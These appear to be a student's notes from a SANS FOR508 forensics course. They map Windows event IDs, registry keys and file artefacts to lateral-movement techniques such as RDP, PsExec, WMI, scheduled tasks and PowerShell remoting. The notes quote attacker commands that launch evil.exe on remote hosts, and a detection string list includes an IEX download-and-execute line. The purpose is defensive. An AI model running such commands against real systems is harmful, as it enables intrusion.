Day 2 FOR508.2
Evolution of Credential Attack Mitigations in Windows
Souce Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | – Logon specifying alternate
|
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx | 1024 | Destination Host Name |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx | 1102 | Destination IP Address |
Source Registry
Type | IOC | Remarks |
---|---|---|
Remote desktop destinations are tracked per-user | NTUSER\Software\Microsoft\TerminalServer Client\Servers | |
ShimCache – SYSTEM | mstsc.exe | Remote Desktop Client |
BAM/DAM – SYSTEM | mstsc.exe | Last Time Executed |
AmCache.hve | mstsc.exe | First Time Executed |
UserAssist – NTUSER.DAT | mstsc.exe |
|
RecentApps – NTUSER.DAT | mstsc.exe |
|
Source File System
Type | IOC | Remarks |
---|---|---|
Jumplists: C:\Users\\ AppData\Roaming\Microsoft\Windows\ Recent\AutomaticDestinations\ | {MSTSC-APPID}- automaticDestinations-ms | Tracks remote desktop connection destination and times |
Prefetch: C:\Windows\Prefetch\ mstsc.exe-{hash}.pf | mstsc.exe-(hash).pf | first/last execution |
Bitmap Cache C:\USERS\\ AppData\Local\Microsoft\Terminal Server Client\Cache | bcache##.bmc | Check bmc-tools |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 10 Source IP/Logon User Name |
security.evtx | 4778/9 | IP Address of Source/Source System Name Logon User Name |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Microsoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx | 131 | Connection Attempts Source IP |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Microsoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx | 98 | Successful Connections |
Microsoft-Windows-Terminal Services-RemoteConnection Manager%4Operational.evtx | 1149 | Source IP/Logon User Name Blank user name may indicate use of Sticky Keys |
Microsoft-Windows-Terminal Services-LocalSessionManager%4Operational.evtx | 21 | Source IP/Logon User Name |
Microsoft-Windows-Terminal Services-LocalSessionManager%4Operational.evtx | 41 | Logon User Name |
Target Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | rdpclip.exe | |
ShimCache – SYSTEM | tstheme.exe | |
AmCache.hve | rdpclip.exe | |
AmCache.hve | tstheme.exe | |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ mstsc.exe-{hash}.pf | rdpclip.exe-{hash}.pf tstheme.exe-{hash}.pf | first/last execution |
Windows Admin Shares (C$ - ADMIN$ - IPC$)
Hunt Evil: Lateral Movement Poster:Map Network Shares
C$ - Drive volume shares
ADMIN$ - %WINDOWSROOT%
IPC$ - Named Pipes
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials
|
Microsoft-WindowsSmbClient%4Security.evtx | 31001 | Failed logon to destination
|
Source Registry
Type | IOC | Remarks |
---|---|---|
MountPoints2 | NTUSER\Software\Microsoft\Windows\ CurrentVersion\Explorer\MountPoints2 | Remotely mapped shares |
Shellbags - USERCLASS.DAT | | Remote folders accessed inside an interactive session via Explorer by attackers |
ShimCache – SYSTEM | net.exe | Remote Desktop Client |
BAM/DAM – SYSTEM | net.exe net1.exe | Last Time Executed |
AmCache.hve | net.exe net1.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | net.exe-{hash}.pf net1.exe-{hash}.pf | first/last execution |
User Profile Artifacts | | Review shortcut files and jumplists for remote files accessed by attackers, if they had interactive access (RDP) |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 |
security.evtx | 4672 |
|
security.evtx | 4776 | NTLM if authenticating to Local System Source Host Name/Logon User Name |
security.evtx | 4768 | TGT Granted Source Host Name/Logon User Name (Available only on domain controller) |
security.evtx | 4769 | Service Ticket Granted if authenticating to Domain Controller
|
security.evtx | 5140 | Share Access |
security.evtx | 5145 | Auditing of shared files – NOISY |
Target Registry
Type | IOC | Remarks |
---|---|---|
| | |
| | |
| | |
Target File System
Type | IOC | Remarks |
---|---|---|
File Creation | |
|
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials
|
Source Registry
Type | IOC | Remarks |
---|---|---|
NTUSER.DAT | Software\SysInternals\PsExec\EulaAccepted | |
ShimCache – SYSTEM | psexec.exe | |
BAM/DAM – SYSTEM | * psexec.exe | Last Time Executed |
AmCache.hve | * psexec.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | psexec.exe-{hash}.pf Possible references to other files accessed | first/last execution |
File Creation | psexec.exe | file downloaded and created on local host as the file is not native to Windows |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials
|
security.evtx | 4624 | Logon Type 3 (and Type 2 if “-u” Alternate Credentials are used)
|
security.evtx | 4672 |
|
security.evtx | 5140 |
|
security.evtx | 7045 |
|
Target Registry
Type | IOC | Remarks |
---|---|---|
New service creation configured | SYSTEM\CurrentControlSet\Services\PSEXESVC | “-r” option can allow attacker to rename service |
ShimCache – SYSTEM | psexesvc.exe | |
AmCache.hve | psexesvc.exe | First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
File Creation |
| |
Source Event logs
Source | ID | Action |
---|---|---|
| | |
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | sc.exe | |
AmCache.hve | sc.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 (and Type 2 if “-u” Alternate Credentials are used)
|
security.evtx | 4697 |
|
system.evtx | 7034 |
|
system.evtx | 7035 |
|
system.evtx | 7036 |
|
system.evtx | 7040 |
|
system.evtx | 7045 |
|
Target Registry
Type | IOC | Remarks |
---|---|---|
New service creation | SYSTEM\CurrentControlSet\Services\ | |
ShimCache – SYSTEM | evil.exe | ShimCache records existence of malicious service executable, unless implemented as a service DLL |
AmCache.hve | evil.exe | First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
File Creation |
| malicious |
Windows Remote Management Tools: WMI/WMIC
Hunt Evil: Lateral Movement Poster: WMI/WMIC
wmic /node:host process call create "C:\temp\evil.exe" Invoke-WmiMethod –Computer host –Class Win32_Process –Name create –Argument "c:\temp\evil.exe" |
---|
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials
|
security.evtx | 4697 |
|
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | wmic.exe | |
BAM/DAM – SYSTEM | wmic.exe | Last Time Executed |
AmCache.hve | wmic.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3
|
security.evtx | 4672 |
|
Microsoft-Windows-WMIActivity%4Operational.evtx | 5857 |
|
Microsoft-Windows-WMIActivity%4Operational.evtx | 5860 5861 |
|
Target Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM |
| |
AmCache.hve |
| First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
File Creation |
| .mof files can be used to manage the WMI Repository |
Changes in: C:\Windows\ |
| Unauthorized changes to the WMI Repository |
Windows Remote Management Tools: Scheduled Tasks
Hunt Evil: Lateral Movement Poster: Scheduled Tasks
at \\host 13:00 "c:\temp\evil.exe" schtasks /CREATE /TN taskname /TR c:\temp\evil.exe /SC once /RU “SYSTEM” /ST 13:00 /S host /U username |
---|
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials
|
security.evtx | 4697 |
|
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM |
| |
BAM/DAM – SYSTEM |
| Last Time Executed |
AmCache.hve |
| First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3
|
security.evtx | 4672 |
|
Microsoft-Windows-WMIActivity%4Operational.evtx | 5857 |
|
Microsoft-Windows-WMIActivity%4Operational.evtx | 5860 5861 |
|
Target Registry
Type | IOC | Remarks |
---|---|---|
SOFTWARE |
| |
ShimCache – SYSTEM |
| |
AmCache.hve |
| First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
File Creation |
| |
Windows Remote Management Tools: PowerShell Remoting
Hunt Evil: Lateral Movement Poster: PowerShell Remoting
Enter-PSSession –ComputerName host Invoke-Command –ComputerName host –ScriptBlock {Start-Process c:\temp\evil.exe} |
---|
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials
|
Microsoft-WindowsWinRM%4Operational.evtx | 6 | WSMan Session initialize
|
Microsoft-WindowsWinRM%4Operational.evtx | 8 15 16 33 | WSMan Sessiondeinitialization
|
Microsoft-WindowsPowerShell%4Operational.evtx | 40961 40962 |
|
Microsoft-WindowsPowerShell%4Operational.evtx | 8193 8194 |
|
Microsoft-WindowsPowerShell%4Operational.evtx | 8197 | Connect
|
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM |
| |
BAM/DAM – SYSTEM |
| Last Time Executed |
AmCache.hve |
| First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution PowerShell scripts (.ps1 files) that run within |
Command history: C:\USERS\\AppData\Roaming\ Microsoft\Windows\PowerShell\ PSReadline\ |
| With PS v5+, a history file with previous 4096 commands is maintained per user |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3
|
security.evtx | 4672 |
|
Microsoft-WindowsPowerShell%4Operational.evtx | 4103 4104 | Script Block logging
|
Microsoft-WindowsPowerShell%4Operational.evtx | 53504 |
|
Windows PowerShell.evtx | 400 403 |
|
Windows PowerShell.evtx | 800 |
|
Microsoft-WindowsWinRM%4Operational.evtx | 91 |
|
Microsoft-WindowsWinRM%4Operational.evtx | 168 |
|
Target Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM |
| |
AmCache.hve |
| First Time Executed |
SOFTWARE |
| Attacker may change execution policy to a less restrictive setting, such as "bypass" |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ |
| first/last execution |
File Creation |
| |
Identify potential malware and determine wether it was executed
Source | ID | Action |
---|---|---|
system.evtx | 1001 |
|
application.evtx | 1000 1001 1002 |
|
Identify potential execution and record full command line used to launch a process (win7+)
Source | ID | Action |
---|---|---|
security.evtx | 4688 |
|
security.evtx | 4689 |
|
security.evtx | 4624 | Type 3 immadiately bevore 4688 |
Enable: gpedit → Comp. config → Policies → Admin. templates → System → Audit Process Creation
http://for508.com/uhat4
Identify PowerShell activity including pipeline output and full script content (Win10, PS5)
Source | ID | Action |
---|---|---|
PS command history %userprofile%\AppData\Roaming\Microsoft\Windows\ | | By default, in Windows 10, the last 4096 typed commands. The history is stored separately for PowerShell and ISE. |
Microsoft-Windows-PowerShell/Operational | 4103 |
|
Microsoft-Windows-PowerShell/Operational | 4104 |
|
Microsoft-Windows-PowerShell/Operational | 4105 | Start Script: Ignore as very noisy |
Microsoft-Windows-PowerShell/Operational | 4106 | Start Script: Ignore as very noisy |
Powershell.evtx | 400 | Not very usefull, but never know... |
Powershell.evtx | 800 | Not very usefull, but never know... |
Enable: gpedit → Comp. config → Policies → Admin. templates → Windows Components→ PowerShell
Why to look for "older" PowerShell executions:
This capability was introduced in the PowerShell v5, in Windows 10. It is based on the third party module PSReadLine, which is not included in the separately installed PowerShell 5 for previous versions of Windows.
same reason for the "downgrade" "powershell -Version 2 -Command <...>"
Look for suspicous strings:
- IEX (New-Object Net.Webclient) .downloadstring("http://evil.ps1")
- download
- Start-Process
- FromBase64String
- rundll32
- IEX
- Invoke-Expression
- WebClient
- powershell -version
- http
- bitstransfer
Check for obfuscations (use entropy/frequency detection)
Enable transcript logs, although it only logs to the user folder.
gpedit → Comp. config → Policies → Admin. templates → Windows Components→ PowerShell
Auditing WMI persitence
Source | ID | Action |
---|---|---|
security.evtx | 5857-5861 |
|
security.evtx | 5861 |
|
WMI-Activity/Operational | | Default enabled W10/2012R2+ |
Look for suspicous strings:
- CommandLine
- ActiveScript
- scrons
- wbemcons
- powershell
- eval
- .vbs
- .ps1
- ActiveXObject
Vista+ and 2008+ use Sysinternals PsTools, it can be used from your forensic workstation and connect to the suspicious machine via network to avoid imense tainting you evidences.
Get-WinEvent -FilterHashtable @{logname="Security";id=4624} | Where {$_.Message match "what ever";}
Get-WinEvent -FilterHashtable @{ComputerName="Security";id=4624} | Where {$_.Message match "what ever";}
Use the PS included in SANS SEC505 course. Look for Day6
SYSMON
Deploy sysmon (with -n -l -i) where ever possible.
Logs to: Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
psexec \\remote-pc -u “DOMAIN\Administrator” -p “password” cmd /c “msiexec.exe /i “\\server\share\application.msi” /quiet /norestart”
- Event ID 1: Process creation
- Event ID 2: A process changed a file creation time
- Event ID 3: Network connection
- Event ID 4: Sysmon service state changed
- Event ID 5: Process terminated
- Event ID 6: Driver loaded
- Event ID 7: Image loaded
- Event ID 8: CreateRemoteThread
- Event ID 9: RawAccessRead
- Event ID 10: ProcessAccess
- Event ID 11: FileCreate
- Event ID 12: RegistryEvent (Object create and delete)
Offline system
Use a commercial forensic tool (FTK, Encase) or Autopsy to carve.
TZWorks maintains a tool EVTXtract
Get-WinEvent -FilterHashtable @{Path="C:\where you put the*.evtx"id=4624} | Where {$_.Message match "what ever";}